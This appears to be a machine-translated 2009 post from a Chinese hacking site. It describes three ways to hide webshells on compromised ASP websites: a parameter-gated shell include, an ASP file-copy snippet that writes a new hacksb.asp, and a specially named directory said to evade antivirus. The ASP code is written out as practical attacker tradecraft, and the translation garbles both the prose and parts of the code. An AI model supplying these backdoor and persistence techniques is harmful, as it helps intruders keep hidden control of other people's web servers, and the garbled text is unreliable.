Three hidden Webshell method-vulnerability warning-the black bar safety net

2009-08-21T00:00:00
ID MYHACK58:62200924347
Type myhack58
Reporter 佚名
Modified 2009-08-21T00:00:00

Description

Author: Rist First: In our to tricks of the asp file added the following contents <%if request("action")="ok" then%> the shell code is inserted here <%end if%> Visit time on your hand leg of the asp files back plus? action=ok,you can

The second: In our to tricks of the asp file added the following contents <% on error resume next strFileName = Request. QueryString("filer") set objStream = Server. createObject("ABODB. Stream") objStream. Type = 1 objStream. Open objStream. LoadFromFile strFileName objStream. SaveToFile Server. mappath("hacksb. asp"),2 %> Access the time in the tricks of the asp files back plus? filer=xxx, xxx is your local upload of a path such as C:\hacksb. asp, After uploading the tricks of the asp in the same folder will be generated automatically hacksb. asp

Third: The premise to get system permissions, Go to the website directory under a layer of mkdir s... copy hacksb. asp s.../ This antivirus software not found Visit http://website/s.../hacksb. asp can be